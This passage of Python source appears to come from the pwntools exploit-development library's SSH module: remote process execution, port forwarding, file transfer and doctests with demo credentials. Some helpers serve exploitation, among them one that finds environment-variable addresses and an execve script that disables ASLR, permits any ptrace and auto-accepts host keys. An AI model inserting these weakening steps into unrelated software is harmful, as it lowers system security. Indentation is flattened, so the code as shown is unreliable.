finder = pwnlib.elf.corefile.CorefileFinder(self)
if not finder.core_path:
self.error("Could not find core file for pid %i" % self.pid)
return pwnlib.elf.corefile.Corefile(finder.core_path)
def getenv(self, variable, **kwargs):
"""Retrieve the address of an environment variable in the remote process.
"""
argv0 = self.argv[0]
script = ';'.join(('from ctypes import *',
'import os',
'libc = CDLL("libc.so.6")',
'print(os.path.realpath(%r))' % self.executable,
'print(libc.getenv(%r))' % variable,))
try:
with context.local(log_level='error'):
python = self.parent.which('python')
if not python:
self.error("Python is not installed on the remote system.")
io = self.parent.process([argv0,'-c', script.strip()],
executable=python,
env=self.env,
**kwargs)
path = io.recvline()
address = int(io.recvline())
address -= len(python)
address += len(path)
return int(address) & context.mask
except:
self.exception("Could not look up environment variable %r" % variable)
def _close_msg(self):
# If we never completely started up, just use the parent implementation
if self.executable is None:
return super(ssh_process, self)._close_msg()
self.info('Stopped remote process %r on %s (pid %i)' \
% (os.path.basename(self.executable),
self.host,
self.pid))
class ssh_connecter(sock):
def __init__(self, parent, host, port, *a, **kw):
super(ssh_connecter, self).__init__(*a, **kw)
# keep the parent from being garbage collected in some cases
self.parent = parent
self.host = parent.host
self.rhost = host
self.rport = port
msg = 'Connecting to %s:%d via SSH to %s' % (self.rhost, self.rport, self.host)
with self.waitfor(msg) as h:
try:
self.sock = parent.transport.open_channel('direct-tcpip', (host, port), ('127.0.0.1', 0))
except Exception as e:
                self.exception(str(e))
raise
try:
# Iterate all layers of proxying to get to base-level Socket object
curr = self.sock.get_transport().sock
while getattr(curr, "get_transport", None):
curr = curr.get_transport().sock
sockname = curr.getsockname()
self.lhost = sockname[0]
self.lport = sockname[1]
except Exception as e:
self.exception("Could not find base-level Socket object.")
raise e
h.success()
def spawn_process(self, *args, **kwargs):
self.error("Cannot use spawn_process on an SSH channel.""")
def _close_msg(self):
self.info("Closed remote connection to %s:%d via SSH connection to %s" % (self.rhost, self.rport, self.host))
class ssh_listener(sock):
def __init__(self, parent, bind_address, port, *a, **kw):
super(ssh_listener, self).__init__(*a, **kw)
# keep the parent from being garbage collected in some cases
self.parent = parent
self.host = parent.host
try:
self.port = parent.transport.request_port_forward(bind_address, port)
except Exception:
            self.failure('Failed to create port forwarding')
raise
def accepter():
msg = 'Waiting on port %d via SSH to %s' % (self.port, self.host)
h = self.waitfor(msg)
try:
self.sock = parent.transport.accept()
parent.transport.cancel_port_forward(bind_address, self.port)
except Exception:
self.sock = None
h.failure()
self.exception('Failed to get a connection')
return
self.rhost, self.rport = self.sock.origin_addr
h.success('Got connection from %s:%d' % (self.rhost, self.rport))
self._accepter = context.Thread(target = accepter)
self._accepter.daemon = True
self._accepter.start()
def _close_msg(self):
self.info("Closed remote connection to %s:%d via SSH listener on port %d via %s" % (self.rhost, self.rport, self.port, self.host))
def spawn_process(self, *args, **kwargs):
self.error("Cannot use spawn_process on an SSH channel.""")
def wait_for_connection(self):
"""Blocks until a connection has been established."""
_ = self.sock
return self
def __getattr__(self, key):
if key == 'sock':
while self._accepter.is_alive():
self._accepter.join(timeout = 0.1)
return self.sock
else:
return getattr(super(ssh_listener, self), key)
class ssh(Timeout, Logger):
#: Remote host name (``str``)
host = None
#: Remote port (``int``)
port = None
#: Working directory (``str``)
cwd = None
#: Enable caching of SSH downloads (``bool``)
cache = True
#: Paramiko SSHClient which backs this object
client = None
#: Paramiko SFTPClient object which is used for file transfers.
#: Set to :const:`None` to disable ``sftp``.
sftp = None
#: PID of the remote ``sshd`` process servicing this connection.
pid = None
def __init__(self, user=None, host=None, port=22, password=None, key=None,
keyfile=None, proxy_command=None, proxy_sock=None,
level=None, cache=True, ssh_agent=False, *a, **kw):
"""Creates a new ssh connection.
Arguments:
user(str): The username to log in with
host(str): The hostname to connect to
port(int): The port to connect to
password(str): Try to authenticate using this password
key(str): Try to authenticate using this private key. The string should be the actual private key.
keyfile(str): Try to authenticate using this private key. The string should be a filename.
proxy_command(str): Use this as a proxy command. It has approximately the same semantics as ProxyCommand from ssh(1).
proxy_sock(str): Use this socket instead of connecting to the host.
timeout: Timeout, in seconds
level: Log level
cache: Cache downloaded files (by hash/size/timestamp)
ssh_agent: If :const:`True`, enable usage of keys via ssh-agent
        NOTE: The proxy_command and proxy_sock arguments are only available if a
fairly new version of paramiko is used.
Example proxying:
>>> s1 = ssh(host='example.pwnme',
... user='travis',
... password='demopass')
>>> r1 = s1.remote('localhost', 22)
>>> s2 = ssh(host='example.pwnme',
... user='travis',
... password='demopass',
... proxy_sock=r1.sock)
>>> r2 = s2.remote('localhost', 22) # and so on...
>>> for x in r2, s2, r1, s1: x.close()
"""
super(ssh, self).__init__(*a, **kw)
Logger.__init__(self)
if level is not None:
self.setLevel(level)
self.host = host
self.port = port
self.user = user
self.password = password
self.key = key
self.keyfile = keyfile
self._cachedir = os.path.join(tempfile.gettempdir(), 'pwntools-ssh-cache')
self.cwd = '.'
self.cache = cache
# Deferred attributes
self._platform_info = {}
self._aslr = None
self._aslr_ulimit = None
misc.mkdir_p(self._cachedir)
# This is a dirty hack to make my Yubikey shut up.
# If anybody has a problem with this, please open a bug and I'll
# figure out a better workaround.
if not ssh_agent:
os.environ.pop('SSH_AUTH_SOCK', None)
import paramiko
# Make a basic attempt to parse the ssh_config file
try:
config_file = os.path.expanduser('~/.ssh/config')
if os.path.exists(config_file):
ssh_config = paramiko.SSHConfig()
ssh_config.parse(open(config_file))
host_config = ssh_config.lookup(host)
if 'hostname' in host_config:
self.host = host = host_config['hostname']
if not keyfile and 'identityfile' in host_config:
keyfile = host_config['identityfile'][0]
if keyfile.lower() == 'none':
keyfile = None
except Exception as e:
self.debug("An error occurred while parsing ~/.ssh/config:\n%s" % e)
keyfiles = [os.path.expanduser(keyfile)] if keyfile else []
msg = 'Connecting to %s on port %d' % (host, port)
with self.waitfor(msg) as h:
self.client = paramiko.SSHClient()
self.client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
known_hosts = os.path.expanduser('~/.ssh/known_hosts')
if os.path.exists(known_hosts):
self.client.load_host_keys(known_hosts)
has_proxy = (proxy_sock or proxy_command) and True
if has_proxy:
if 'ProxyCommand' not in dir(paramiko):
self.error('This version of paramiko does not support proxies.')
if proxy_sock and proxy_command:
self.error('Cannot have both a proxy command and a proxy sock')
if proxy_command:
proxy_sock = paramiko.ProxyCommand(proxy_command)
self.client.connect(host, port, user, password, key, keyfiles, self.timeout, compress = True, sock = proxy_sock)
else:
self.client.connect(host, port, user, password, key, keyfiles, self.timeout, compress = True)
self.transport = self.client.get_transport()
self.transport.use_compression(True)
h.success()
self._tried_sftp = False
with context.local(log_level='error'):
def getppid():
print(os.getppid())
try:
self.pid = int(self.process('false', preexec_fn=getppid).recvall())
except Exception:
self.pid = None
try:
self.info_once(self.checksec())
except Exception:
self.warn_once("Couldn't check security settings on %r" % self.host)
@property
def sftp(self):
if not self._tried_sftp:
try:
self._sftp = self.transport.open_sftp_client()
except Exception:
self._sftp = None
self._tried_sftp = True
return self._sftp
@sftp.setter
def sftp(self, value):
self._sftp = value
self._tried_sftp = True
def __enter__(self, *a):
return self
def __exit__(self, *a, **kw):
self.close()
def shell(self, shell = None, tty = True, timeout = Timeout.default):
"""shell(shell = None, tty = True, timeout = Timeout.default) -> ssh_channel
Open a new channel with a shell inside.
Arguments:
shell(str): Path to the shell program to run.
If :const:`None`, uses the default shell for the logged in user.
tty(bool): If :const:`True`, then a TTY is requested on the remote server.
Returns:
Return a :class:`pwnlib.tubes.ssh.ssh_channel` object.
Examples:
>>> s = ssh(host='example.pwnme',
... user='travis',
... password='demopass')
>>> sh = s.shell('/bin/sh')
>>> sh.sendline(b'echo Hello; exit')
>>> print(b'Hello' in sh.recvall())
True
"""
return self.run(shell, tty, timeout = timeout)
def process(self, argv=None, executable=None, tty=True, cwd=None, env=None, timeout=Timeout.default, run=True,
stdin=0, stdout=1, stderr=2, preexec_fn=None, preexec_args=(), raw=True, aslr=None, setuid=None,
shell=False):
r"""
Executes a process on the remote server, in the same fashion
as pwnlib.tubes.process.process.
To achieve this, a Python script is created to call ``os.execve``
with the appropriate arguments.
As an added bonus, the ``ssh_channel`` object returned has a
``pid`` property for the process pid.
Arguments:
argv(list):
List of arguments to pass into the process
executable(str):
Path to the executable to run.
If :const:`None`, ``argv[0]`` is used.
tty(bool):
Request a `tty` from the server. This usually fixes buffering problems
by causing `libc` to write data immediately rather than buffering it.
However, this disables interpretation of control codes (e.g. Ctrl+C)
and breaks `.shutdown`.
cwd(str):
Working directory. If :const:`None`, uses the working directory specified
on :attr:`cwd` or set via :meth:`set_working_directory`.
env(dict):
Environment variables to set in the child. If :const:`None`, inherits the
default environment.
timeout(int):
Timeout to set on the `tube` created to interact with the process.
run(bool):
Set to :const:`True` to run the program (default).
If :const:`False`, returns the path to an executable Python script on the
remote server which, when executed, will do it.
stdin(int, str):
If an integer, replace stdin with the numbered file descriptor.
                If a string, open a file with the specified path and replace
stdin with its file descriptor. May also be one of ``sys.stdin``,
``sys.stdout``, ``sys.stderr``. If :const:`None`, the file descriptor is closed.
stdout(int, str):
See ``stdin``.
stderr(int, str):
See ``stdin``.
preexec_fn(callable):
Function which is executed on the remote side before execve().
This **MUST** be a self-contained function -- it must perform
all of its own imports, and cannot refer to variables outside
its scope.
preexec_args(object):
Argument passed to ``preexec_fn``.
This **MUST** only consist of native Python objects.
raw(bool):
If :const:`True`, disable TTY control code interpretation.
aslr(bool):
See :class:`pwnlib.tubes.process.process` for more information.
setuid(bool):
See :class:`pwnlib.tubes.process.process` for more information.
shell(bool):
Pass the command-line arguments to the shell.
Returns:
A new SSH channel, or a path to a script if ``run=False``.
Notes:
Requires Python on the remote server.
Examples:
>>> s = ssh(host='example.pwnme',
... user='travis',
... password='demopass')
>>> sh = s.process('/bin/sh', env={'PS1':''})
>>> sh.sendline(b'echo Hello; exit')
>>> sh.recvall()
b'Hello\n'
>>> s.process(['/bin/echo', b'\xff']).recvall()
b'\xff\n'
>>> s.process(['readlink', '/proc/self/exe']).recvall()
b'/bin/readlink\n'
>>> s.process(['LOLOLOL', '/proc/self/exe'], executable='readlink').recvall()
b'/bin/readlink\n'
>>> s.process(['LOLOLOL\x00', '/proc/self/cmdline'], executable='cat').recvall()
b'LOLOLOL\x00/proc/self/cmdline\x00'
>>> sh = s.process(executable='/bin/sh')
>>> str(sh.pid).encode() in s.pidof('sh') # doctest: +SKIP
True
>>> s.process(['pwd'], cwd='/tmp').recvall()
b'/tmp\n'
>>> p = s.process(['python','-c','import os; os.write(1, os.read(2, 1024))'], stderr=0)
>>> p.send(b'hello')
>>> p.recv()
b'hello'
>>> s.process(['/bin/echo', 'hello']).recvall()
b'hello\n'
>>> s.process(['/bin/echo', 'hello'], stdout='/dev/null').recvall()
b''
>>> s.process(['/usr/bin/env'], env={}).recvall()
b''
>>> s.process('/usr/bin/env', env={'A':'B'}).recvall()
b'A=B\n'
>>> s.process('false', preexec_fn=1234)
Traceback (most recent call last):
...
PwnlibException: preexec_fn must be a function
>>> s.process('false', preexec_fn=lambda: 1234)
Traceback (most recent call last):
...
PwnlibException: preexec_fn cannot be a lambda
>>> def uses_globals():
... foo = bar
>>> print(s.process('false', preexec_fn=uses_globals).recvall().strip().decode()) # doctest: +ELLIPSIS
Traceback (most recent call last):
...
NameError: ... name 'bar' is not defined
>>> s.process('echo hello', shell=True).recvall()
b'hello\n'
>>> io = s.process(['cat'], timeout=5)
>>> io.recvline()
b''
"""
if not argv and not executable:
self.error("Must specify argv or executable")
argv = argv or []
aslr = aslr if aslr is not None else context.aslr
if isinstance(argv, (six.text_type, six.binary_type)):
argv = [argv]
if not isinstance(argv, (list, tuple)):
self.error('argv must be a list or tuple')
if not all(isinstance(arg, (six.text_type, six.binary_type)) for arg in argv):
self.error("argv must be strings or bytes: %r" % argv)
if shell:
if len(argv) != 1:
self.error('Cannot provide more than 1 argument if shell=True')
argv = ['/bin/sh', '-c'] + argv
# Create a duplicate so we can modify it
argv = list(argv or [])
# Python doesn't like when an arg in argv contains '\x00'
# -> execve() arg 2 must contain only strings
for i, oarg in enumerate(argv):
if isinstance(oarg, six.text_type):
arg = oarg.encode('utf-8')
else:
arg = oarg
if b'\x00' in arg[:-1]:
self.error('Inappropriate nulls in argv[%i]: %r' % (i, oarg))
argv[i] = bytearray(arg.rstrip(b'\x00'))
if env is not None and not isinstance(env, dict) and env != os.environ:
self.error("env must be a dict: %r" % env)
# Converts the environment variables to a list of tuples to retain order.
env2 = []
# Python also doesn't like when envp contains '\x00'
if env and hasattr(env, 'items'):
for k, v in env.items():
if isinstance(k, six.text_type):
k = k.encode('utf-8')
if isinstance(v, six.text_type):
v = v.encode('utf-8')
if b'\x00' in k[:-1]:
self.error('Inappropriate nulls in environment key %r' % k)
if b'\x00' in v[:-1]:
self.error('Inappropriate nulls in environment value %r=%r' % (k, v))
env2.append((bytearray(k.rstrip(b'\x00')), bytearray(v.rstrip(b'\x00'))))
env = env2 or env
executable = executable or argv[0]
cwd = cwd or self.cwd
# Validate, since failures on the remote side will suck.
if not isinstance(executable, (six.text_type, six.binary_type, bytearray)):
self.error("executable / argv[0] must be a string: %r" % executable)
executable = context._decode(executable)
# Allow passing in sys.stdin/stdout/stderr objects
handles = {sys.stdin: 0, sys.stdout:1, sys.stderr:2}
stdin = handles.get(stdin, stdin)
stdout = handles.get(stdout, stdout)
stderr = handles.get(stderr, stderr)
# Allow the user to provide a self-contained function to run
def func(): pass
func = preexec_fn or func
func_args = preexec_args
if not isinstance(func, types.FunctionType):
self.error("preexec_fn must be a function")
func_name = func.__name__
if func_name == (lambda: 0).__name__:
self.error("preexec_fn cannot be a lambda")
func_src = inspect.getsource(func).strip()
setuid = True if setuid is None else bool(setuid)
script = r"""
#!/usr/bin/env python
import os, sys, ctypes, resource, platform, stat
from collections import OrderedDict
try:
integer_types = int, long
except NameError:
integer_types = int,
exe = %(executable)r
argv = [bytes(a) for a in %(argv)r]
env = %(env)r
os.chdir(%(cwd)r)
if env is not None:
env = OrderedDict((bytes(k), bytes(v)) for k,v in env)
os.environ.clear()
getattr(os, 'environb', os.environ).update(env)
else:
env = os.environ
def is_exe(path):
return os.path.isfile(path) and os.access(path, os.X_OK)
PATH = os.environ.get('PATH','').split(os.pathsep)
if os.path.sep not in exe and not is_exe(exe):
for path in PATH:
test_path = os.path.join(path, exe)
if is_exe(test_path):
exe = test_path
break
if not is_exe(exe):
sys.stderr.write('3\n')
sys.stderr.write("{} is not executable or does not exist in $PATH: {}".format(exe,PATH))
sys.exit(-1)
if not %(setuid)r:
PR_SET_NO_NEW_PRIVS = 38
result = ctypes.CDLL('libc.so.6').prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0)
if result != 0:
sys.stdout.write('3\n')
sys.stdout.write("Could not disable setuid: prctl(PR_SET_NO_NEW_PRIVS) failed")
sys.exit(-1)
try:
PR_SET_PTRACER = 0x59616d61
PR_SET_PTRACER_ANY = -1
ctypes.CDLL('libc.so.6').prctl(PR_SET_PTRACER, PR_SET_PTRACER_ANY, 0, 0, 0)
except Exception:
pass
# Determine what UID the process will execute as
# This is used for locating apport core dumps
suid = os.getuid()
sgid = os.getgid()
st = os.stat(exe)
if %(setuid)r:
if (st.st_mode & stat.S_ISUID):
suid = st.st_uid
if (st.st_mode & stat.S_ISGID):
sgid = st.st_gid
if sys.argv[-1] == 'check':
sys.stdout.write("1\n")
sys.stdout.write(str(os.getpid()) + "\n")
sys.stdout.write(str(os.getuid()) + "\n")
sys.stdout.write(str(os.getgid()) + "\n")
sys.stdout.write(str(suid) + "\n")
sys.stdout.write(str(sgid) + "\n")
sys.stdout.write(os.path.realpath(exe) + '\x00')
sys.stdout.flush()
for fd, newfd in {0: %(stdin)r, 1: %(stdout)r, 2:%(stderr)r}.items():
if newfd is None:
os.close(fd)
elif isinstance(newfd, (str, bytes)):
newfd = os.open(newfd, os.O_RDONLY if fd == 0 else (os.O_RDWR|os.O_CREAT))
os.dup2(newfd, fd)
os.close(newfd)
elif isinstance(newfd, integer_types) and newfd != fd:
os.dup2(fd, newfd)
if not %(aslr)r:
if platform.system().lower() == 'linux' and %(setuid)r is not True:
ADDR_NO_RANDOMIZE = 0x0040000
ctypes.CDLL('libc.so.6').personality(ADDR_NO_RANDOMIZE)
resource.setrlimit(resource.RLIMIT_STACK, (-1, -1))
# Attempt to dump ALL core file regions
try:
with open('/proc/self/coredump_filter', 'w') as core_filter:
core_filter.write('0x3f\n')
except Exception:
pass
# Assume that the user would prefer to have core dumps.
try:
resource.setrlimit(resource.RLIMIT_CORE, (-1, -1))
except Exception:
pass
%(func_src)s
%(func_name)s(*%(func_args)r)
os.execve(exe, argv, env)
""" % locals()
script = script.strip()
self.debug("Created execve script:\n" + script)
if not run:
with context.local(log_level='error'):
tmpfile = self.mktemp('-t', 'pwnlib-execve-XXXXXXXXXX')
self.chmod('+x', tmpfile)
self.info("Uploading execve script to %r" % tmpfile)
self.upload_data(script, tmpfile)
return tmpfile
if self.isEnabledFor(logging.DEBUG):
execve_repr = "execve(%r, %s, %s)" % (executable,
argv,
'os.environ'
if (env in (None, os.environ))
else env)
# Avoid spamming the screen
if self.isEnabledFor(logging.DEBUG) and len(execve_repr) > 512:
execve_repr = execve_repr[:512] + '...'
else:
execve_repr = repr(executable)
msg = 'Starting remote process %s on %s' % (execve_repr, self.host)
if timeout == Timeout.default:
timeout = self.timeout
with self.progress(msg) as h:
script = 'for py in python2.7 python2 python; do test -x "$(which $py 2>&1)" && exec $py -c %s check; done; echo 2' % sh_string(script)
with context.quiet:
python = ssh_process(self, script, tty=True, raw=True, level=self.level, timeout=timeout)
try:
result = safeeval.const(python.recvline())
except (EOFError, ValueError):
h.failure("Process creation failed")
self.warn_once('Could not find a Python interpreter on %s\n' % self.host \
+ "Use ssh.run() instead of ssh.process()")
return None
# If an error occurred, try to grab as much output
# as we can.
if result != 1:
error_message = python.recvrepeat(timeout=1)
if result == 0:
self.error("%r does not exist or is not executable" % executable)
elif result == 3:
self.error(error_message)
elif result == 2:
self.error("python is not installed on the remote system %r" % self.host)
elif result != 1:
h.failure("something bad happened:\n%s" % error_message)
python.pid = safeeval.const(python.recvline())
python.uid = safeeval.const(python.recvline())
python.gid = safeeval.const(python.recvline())
python.suid = safeeval.const(python.recvline())
python.sgid = safeeval.const(python.recvline())
python.argv = argv
python.executable = context._decode(python.recvuntil(b'\x00')[:-1])
h.success('pid %i' % python.pid)
if not aslr and setuid and (python.uid != python.suid or python.gid != python.sgid):
effect = "partial" if self.aslr_ulimit else "no"
message = "Specfied aslr=False on setuid binary %s\n" % python.executable
message += "This will have %s effect. Add setuid=False to disable ASLR for debugging.\n" % effect
if self.aslr_ulimit:
message += "Unlimited stack size should de-randomize shared libraries."
self.warn_once(message)
elif not aslr:
self.warn_once("ASLR is disabled for %r!" % python.executable)
return python
def which(self, program):
"""which(program) -> str
Minor modification to just directly invoking ``which`` on the remote
system which adds the current working directory to the end of ``$PATH``.
"""
# If name is a path, do not attempt to resolve it.
if os.path.sep in program:
return program
result = self.run('export PATH=$PATH:$PWD; which %s' % program).recvall().strip().decode()
if ('/%s' % program) not in result:
return None
return result
def system(self, process, tty = True, wd = None, env = None, timeout = None, raw = True):
r"""system(process, tty = True, wd = None, env = None, timeout = Timeout.default, raw = True) -> ssh_channel
Open a new channel with a specific process inside. If `tty` is True,
then a TTY is requested on the remote server.
If `raw` is True, terminal control codes are ignored and input is not
echoed back.
Return a :class:`pwnlib.tubes.ssh.ssh_channel` object.
Examples:
>>> s = ssh(host='example.pwnme',
... user='travis',
... password='demopass')
>>> py = s.run('python -i')
>>> _ = py.recvuntil(b'>>> ')
>>> py.sendline(b'print(2+2)')
>>> py.sendline(b'exit')
>>> print(repr(py.recvline()))
b'4\n'
"""
if wd is None:
wd = self.cwd
if timeout is None:
timeout = self.timeout
return ssh_channel(self, process, tty, wd, env, timeout = timeout, level = self.level, raw = raw)
#: Backward compatibility. Use :meth:`system`
run = system
def getenv(self, variable, **kwargs):
"""Retrieve the address of an environment variable on the remote
system.
Note:
The exact address will differ based on what other environment
variables are set, as well as argv[0]. In order to ensure that
the path is *exactly* the same, it is recommended to invoke the
process with ``argv=[]``.
"""
script = '''
from ctypes import *; libc = CDLL('libc.so.6'); print(libc.getenv(%r))
''' % variable
with context.local(log_level='error'):
python = self.which('python')
if not python:
self.error("Python is not installed on the remote system.")
io = self.process(['','-c', script.strip()], executable=python, **kwargs)
result = io.recvall()
try:
return int(result) & context.mask
except ValueError:
self.exception("Could not look up environment variable %r" % variable)
def run_to_end(self, process, tty = False, wd = None, env = None):
r"""run_to_end(process, tty = False, timeout = Timeout.default, env = None) -> str
Run a command on the remote server and return a tuple with
(data, exit_status). If `tty` is True, then the command is run inside
a TTY on the remote server.
Examples:
>>> s = ssh(host='example.pwnme',
... user='travis',
... password='demopass')
>>> print(s.run_to_end('echo Hello; exit 17'))
(b'Hello\n', 17)
"""
with context.local(log_level = 'ERROR'):
c = self.run(process, tty, wd = wd, timeout = Timeout.default)
data = c.recvall()
retcode = c.wait()
c.close()
return data, retcode
def connect_remote(self, host, port, timeout = Timeout.default):
r"""connect_remote(host, port, timeout = Timeout.default) -> ssh_connecter
Connects to a host through an SSH connection. This is equivalent to
using the ``-L`` flag on ``ssh``.
Returns a :class:`pwnlib.tubes.ssh.ssh_connecter` object.
Examples:
>>> from pwn import *
>>> l = listen()
>>> s = ssh(host='example.pwnme',
... user='travis',
... password='demopass')
>>> a = s.connect_remote(s.host, l.lport)
>>> a=a; b = l.wait_for_connection() # a=a; prevents hangs
>>> a.sendline(b'Hello')
>>> print(repr(b.recvline()))
b'Hello\n'
"""
return ssh_connecter(self, host, port, timeout, level=self.level)
remote = connect_remote
def listen_remote(self, port = 0, bind_address = '', timeout = Timeout.default):
r"""listen_remote(port = 0, bind_address = '', timeout = Timeout.default) -> ssh_connecter
Listens remotely through an SSH connection. This is equivalent to
using the ``-R`` flag on ``ssh``.
Returns a :class:`pwnlib.tubes.ssh.ssh_listener` object.
Examples:
>>> from pwn import *
>>> s = ssh(host='example.pwnme',
... user='travis',
... password='demopass')
>>> l = s.listen_remote()
>>> a = remote(s.host, l.port)
>>> a=a; b = l.wait_for_connection() # a=a; prevents hangs
>>> a.sendline(b'Hello')
>>> print(repr(b.recvline()))
b'Hello\n'
"""
return ssh_listener(self, bind_address, port, timeout, level=self.level)
listen = listen_remote
def __getitem__(self, attr):
"""Permits indexed access to run commands over SSH
Examples:
>>> s = ssh(host='example.pwnme',
... user='travis',
... password='demopass')
>>> print(repr(s['echo hello']))
b'hello'
"""
return self.__getattr__(attr)()
def __call__(self, attr):
"""Permits function-style access to run commands over SSH
Examples:
>>> s = ssh(host='example.pwnme',
... user='travis',
... password='demopass')
>>> print(repr(s('echo hello')))
b'hello'
"""
return self.__getattr__(attr)()
def __getattr__(self, attr):
"""Permits member access to run commands over SSH
Examples:
>>> s = ssh(host='example.pwnme',
... user='travis',
... password='demopass')
>>> s.echo('hello')
b'hello'
>>> s.whoami()
b'travis'
>>> s.echo(['huh','yay','args'])
b'huh yay args'
"""
bad_attrs = [
'trait_names', # ipython tab-complete
]
if attr in self.__dict__ \
or attr in bad_attrs \
or attr.startswith('_'):
raise AttributeError
def runner(*args):
if len(args) == 1 and isinstance(args[0], (list, tuple)):
command = [attr] + args[0]
else:
command = ' '.join((attr,) + args)
return self.run(command).recvall().strip()
return runner
def connected(self):
"""Returns True if we are connected.
Example:
>>> s = ssh(host='example.pwnme',
... user='travis',
... password='demopass')
>>> s.connected()
True
>>> s.close()
>>> s.connected()
False
"""
return bool(self.client and self.client.get_transport().is_active())
def close(self):
"""Close the connection."""
if self.client:
self.client.close()
self.client = None
self.info("Closed connection to %r" % self.host)
def _libs_remote(self, remote):
"""Return a dictionary of the libraries used by a remote file."""
escaped_remote = sh_string(remote)
cmd = ''.join([
'(',
'ulimit -s unlimited;',
'ldd %s > /dev/null &&' % escaped_remote,
'(',
'LD_TRACE_LOADED_OBJECTS=1 %s||' % escaped_remote,
'ldd %s' % escaped_remote,
'))',
' 2>/dev/null'
])
data, status = self.run_to_end(cmd)
if status != 0:
self.error('Unable to find libraries for %r' % remote)
return {}
return misc.parse_ldd_output(context._decode(data))
def _get_fingerprint(self, remote):
cmd = '(sha256 || sha256sum || openssl sha256) 2>/dev/null < '
cmd = cmd + sh_string(remote)
data, status = self.run_to_end(cmd)
if status != 0:
return None
# OpenSSL outputs in the format of...
# (stdin)= e3b0c4429...
data = data.replace(b'(stdin)= ',b'')
# sha256 and sha256sum outputs in the format of...
# e3b0c442... -
data = data.replace(b'-',b'').strip()
if not isinstance(data, str):
data = data.decode('ascii')
return data
def _get_cachefile(self, fingerprint):
return os.path.join(self._cachedir, fingerprint)
def _verify_local_fingerprint(self, fingerprint):
if not set(fingerprint).issubset(string.hexdigits) or \
len(fingerprint) != 64:
self.error('Invalid fingerprint %r' % fingerprint)
return False
local = self._get_cachefile(fingerprint)
if not os.path.isfile(local):
return False
if hashes.sha256filehex(local) == fingerprint:
return True
else:
os.unlink(local)
return False
def _download_raw(self, remote, local, h):
def update(has, total):
h.status("%s/%s" % (misc.size(has), misc.size(total)))
if self.sftp:
try:
self.sftp.get(remote, local, update)
return
except IOError:
pass
cmd = 'wc -c < ' + sh_string(remote)
total, exitcode = self.run_to_end(cmd)
if exitcode != 0:
h.failure("%r does not exist or is not accessible" % remote)
return
total = int(total)
with context.local(log_level = 'ERROR'):
cmd = 'cat < ' + sh_string(remote)
c = self.run(cmd)
data = b''
while True:
try:
data += c.recv()
except EOFError:
break
update(len(data), total)
result = c.wait()
if result != 0:
h.failure('Could not download file %r (%r)' % (remote, result))
return
with open(local, 'wb') as fd:
fd.write(data)
def _download_to_cache(self, remote, p):
with context.local(log_level='error'):
remote = self.readlink('-f',remote)
if not hasattr(remote, 'encode'):
remote = remote.decode('utf-8')
fingerprint = self._get_fingerprint(remote)
if fingerprint is None:
local = os.path.normpath(remote)
local = os.path.basename(local)
local += time.strftime('-%Y-%m-%d-%H:%M:%S')
local = os.path.join(self._cachedir, local)
self._download_raw(remote, local, p)
return local
local = self._get_cachefile(fingerprint)
if self.cache and self._verify_local_fingerprint(fingerprint):
p.success('Found %r in ssh cache' % remote)
else:
self._download_raw(remote, local, p)
if not self._verify_local_fingerprint(fingerprint):
p.failure('Could not download file %r' % remote)
return local
def download_data(self, remote):
"""Downloads a file from the remote server and returns it as a string.
Arguments:
remote(str): The remote filename to download.
Examples:
>>> with open('/tmp/bar','w+') as f:
... _ = f.write('Hello, world')
>>> s = ssh(host='example.pwnme',
... user='travis',
... password='demopass',
... cache=False)
>>> s.download_data('/tmp/bar')
b'Hello, world'
>>> s._sftp = None
>>> s._tried_sftp = True
>>> s.download_data('/tmp/bar')
b'Hello, world'
"""
with self.progress('Downloading %r' % remote) as p:
with open(self._download_to_cache(remote, p), 'rb') as fd:
return fd.read()
def download_file(self, remote, local = None):
"""Downloads a file from the remote server.
The file is cached in /tmp/pwntools-ssh-cache using a hash of the file, so
calling the function twice has little overhead.
Arguments:
remote(str): The remote filename to download
local(str): The local filename to save it to. Default is to infer it from the remote filename.
"""
if not local:
local = os.path.basename(os.path.normpath(remote))
if os.path.basename(remote) == remote:
remote = os.path.join(self.cwd, remote)
with self.progress('Downloading %r to %r' % (remote, local)) as p:
local_tmp = self._download_to_cache(remote, p)
# Check to see if an identical copy of the file already exists
if not os.path.exists(local) or hashes.sha256filehex(local_tmp) != hashes.sha256filehex(local):
shutil.copy2(local_tmp, local)
def download_dir(self, remote=None, local=None):
"""Recursively downloads a directory from the remote server
Arguments:
local: Local directory
remote: Remote directory
"""
remote = remote or self.cwd
if self.sftp:
remote = str(self.sftp.normalize(remote))
else:
with context.local(log_level='error'):
remote = self.system('readlink -f ' + sh_string(remote))
basename = os.path.basename(remote)
local = local or '.'
local = os.path.expanduser(local)
self.info("Downloading %r to %r" % (basename,local))
with context.local(log_level='error'):
remote_tar = self.mktemp()
cmd = 'tar -C %s -czf %s %s' % \
(sh_string(remote),
sh_string(remote_tar),
sh_string(basename))
tar = self.system(cmd)
if 0 != tar.wait():
self.error("Could not create remote tar")
local_tar = tempfile.NamedTemporaryFile(suffix='.tar.gz')
self.download_file(remote_tar, local_tar.name)
tar = tarfile.open(local_tar.name)
tar.extractall(local)
def upload_data(self, data, remote):
"""Uploads some data into a file on the remote server.
Arguments:
data(str): The data to upload.
remote(str): The filename to upload it to.
Example:
>>> s = ssh(host='example.pwnme',
... user='travis',
... password='demopass')
>>> s.upload_data(b'Hello, world', '/tmp/upload_foo')
>>> print(open('/tmp/upload_foo').read())
Hello, world
>>> s._sftp = False
>>> s._tried_sftp = True
>>> s.upload_data(b'Hello, world', '/tmp/upload_bar')
>>> print(open('/tmp/upload_bar').read())
Hello, world
"""
data = context._encode(data)
# If a relative path was provided, prepend the cwd
if os.path.normpath(remote) == os.path.basename(remote):
remote = os.path.join(self.cwd, remote)
if self.sftp:
with tempfile.NamedTemporaryFile() as f:
f.write(data)
f.flush()
self.sftp.put(f.name, remote)
return
with context.local(log_level = 'ERROR'):
cmd = 'cat > ' + sh_string(remote)
s = self.run(cmd, tty=False)
s.send(data)
s.shutdown('send')
data = s.recvall()
result = s.wait()
if result != 0:
self.error("Could not upload file %r (%r)\n%s" % (remote, result, data))
def upload_file(self, filename, remote = None):
"""Uploads a file to the remote server. Returns the remote filename.
Arguments:
filename(str): The local filename to download
remote(str): The remote filename to save it to. Default is to infer it from the local filename."""
if remote is None:
remote = os.path.normpath(filename)
remote = os.path.basename(remote)
remote = os.path.join(self.cwd, remote)
with open(filename, 'rb') as fd:
data = fd.read()
self.info("Uploading %r to %r" % (filename,remote))
self.upload_data(data, remote)
return remote
